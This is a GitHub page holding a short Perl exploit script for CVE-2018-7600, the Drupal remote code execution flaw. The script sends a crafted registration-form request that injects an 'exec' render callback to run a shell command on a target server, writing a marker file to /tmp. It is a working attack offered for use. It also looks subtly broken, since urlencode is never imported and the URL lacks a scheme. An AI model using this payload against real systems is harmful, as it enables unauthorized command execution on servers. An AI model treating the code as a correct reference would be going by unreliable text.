-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathCVE-2018-7600.pl
28 lines (21 loc) · 962 Bytes
/
CVE-2018-7600.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
$target = $ARGV[0];
$drupal_path = $ARGV[1];
if(!$target || !$drupal_path) {
print "Usage: perl $0 <target> <drupal_path>\n";
print "Example: perl $0 www.example.com /drupal\n";
exit;
}
$exploit = $target . $drupal_path . "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
$post_data = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=" . urlencode("echo \"VULNERABLE\" > /tmp/vulnerable.txt");
$response = $ua->post($exploit, Content_Type => 'application/x-www-form-urlencoded', Content => $post_data);
if($response->is_success) {
print "Exploit successful!\n";
print "Check /tmp/vulnerable.txt\n";
}
else {
print "Exploit failed.\n";
}